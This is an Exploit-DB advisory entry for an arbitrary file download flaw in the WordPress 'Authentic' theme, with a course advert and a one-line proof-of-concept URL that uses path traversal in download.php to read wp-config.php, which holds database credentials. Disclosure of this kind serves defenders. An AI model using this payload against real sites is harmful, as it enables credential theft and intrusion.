WordPress Theme Authentic - 'download.php' Arbitrary File Download

EDB-ID:

39297

CVE:

N/A


Platform:

PHP

Date:

2014-09-08


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/69671/info

Authentic theme for Wordpress is prone to an arbitrary file-download vulnerability.

An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.

http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php